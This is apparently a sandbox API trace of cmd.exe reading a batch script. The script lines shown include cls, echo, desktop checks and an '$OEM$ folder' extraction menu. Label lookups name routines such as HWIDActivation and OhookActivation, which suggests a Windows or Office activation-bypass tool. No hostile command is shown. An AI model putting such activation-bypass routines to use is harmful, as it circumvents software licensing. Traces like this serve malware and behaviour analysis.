lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtract$OEM$\r\n") returned 2 [0176.487] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nact$OEM$\r\n") returned 5 [0176.487] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extract $OEM$ Folder\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extract $OEM$ Folder\r\n=============================================================================================================\r\n") returned 29 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 76, 30\r\nt $OEM$ Folder\r\n") returned 13 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nde 76, 30\r\n") returned 2 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"!_desktop_!\\\" (\r\n", cbMultiByte=31, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not exist \"!_desktop_!\\\" (\r\n===========================================================================================================\r\n") returned 31 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\nist \"!_desktop_!\\\" (\r\n") returned 9 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Desktop location was not detected, aborting...\r\n", cbMultiByte=53, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Desktop location was not detected, aborting...\r\n=====================================================================================\r\n") returned 53 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo _____________________________________________________\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo _____________________________________________________\r\n==============================================================================\r\n") returned 60 [0176.488] GetFileType (hFile=0xac) returned 0x1 [0176.488] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n___________________________________________________\r\n") returned 7 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n____\r\n") returned 54 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pause >nul\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="pause >nul\r\n %_Yellow% \"Press any key to go back...\"\r\n") returned 12 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto Extras\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto Extras\r\n%_Yellow% \"Press any key to go back...\"\r\n") returned 13 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no Extras\r\n") returned 3 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.489] GetFileType (hFile=0xac) returned 0x1 [0176.489] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if exist \"!_desktop_!\\$OEM$\\\" (\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if exist \"!_desktop_!\\$OEM$\\\" (\r\n key to go back...\"\r\n") returned 33 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\n\"!_desktop_!\\$OEM$\\\" (\r\n") returned 9 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo $OEM$ folder already exists on the Desktop.\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo $OEM$ folder already exists on the Desktop.\r\n.\"\r\n") returned 50 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo _____________________________________________________\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo _____________________________________________________\r\n") returned 60 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n___________________________________________________\r\n") returned 7 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n____\r\n") returned 54 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pause >nul\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="pause >nul\r\n %_Yellow% \"Press any key to go back...\"\r\n") returned 12 [0176.490] GetFileType (hFile=0xac) returned 0x1 [0176.490] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto Extras\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto Extras\r\n%_Yellow% \"Press any key to go back...\"\r\n") returned 13 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no Extras\r\n") returned 3 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extract$OEM$2\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extract$OEM$2\r\nellow% \"Press any key to go back...\"\r\n") returned 16 [0176.491] _wcsicmp (_String1="_colorprep", _String2="Extract$OEM$2") returned -6 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtract$OEM$2\r\n") returned 2 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nact$OEM$2\r\n") returned 5 [0176.491] GetFileType (hFile=0xac) returned 0x1 [0176.491] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extract $OEM$ Folder\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extract $OEM$ Folder\r\n any key to go back...\"\r\n") returned 29 [0176.492] GetFileType (hFile=0xac) returned 0x1 [0176.492] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 78, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 78, 30\r\nt $OEM$ Folder\r\n") returned 13 [0176.492] GetFileType (hFile=0xac) returned 0x1 [0176.492] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n, 30\r\n") returned 7 [0176.492] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.492] _wcsicmp (_String1="_colorprep", _String2="Extract$OEM$3") returned -6 [0176.492] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.492] _wcsicmp (_String1="_colorprep", _String2="HWIDActivation") returned -9 [0176.492] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.493] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.494] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.495] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.496] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dl_final") returned -5 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dk_checksku") returned -5 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dk_checkperm") returned -5 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dk_refresh") returned -5 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dk_act") returned -5 [0176.497] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.497] _wcsicmp (_String1="_colorprep", _String2="dk_actids") returned -5 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="getactivationid") returned -8 [0176.498] _wcsicmp (_String1="_colorprep", _String2="getactivationid") returned -8 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="dk_ckeckwmic") returned -5 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="dk_product") returned -5 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="dk_reflection") returned -5 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="dk_errorcheck") returned -5 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.498] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.499] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="wpatest") returned -24 [0176.500] _wcsicmp (_String1="_colorprep", _String2="wpatest") returned -24 [0176.500] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="dk_color") returned -5 [0176.500] _wcsicmp (_String1="_colorprep", _String2="dk_color2") returned -5 [0176.500] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.500] _wcsicmp (_String1="_colorprep", _String2="dk_done") returned -5 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="hwiddata") returned -9 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.501] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="hwidfallback") returned -9 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="OhookActivation") returned -16 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.502] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="oh_menu") returned -16 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="oh_menu2") returned -16 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.503] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.504] _wcsicmp 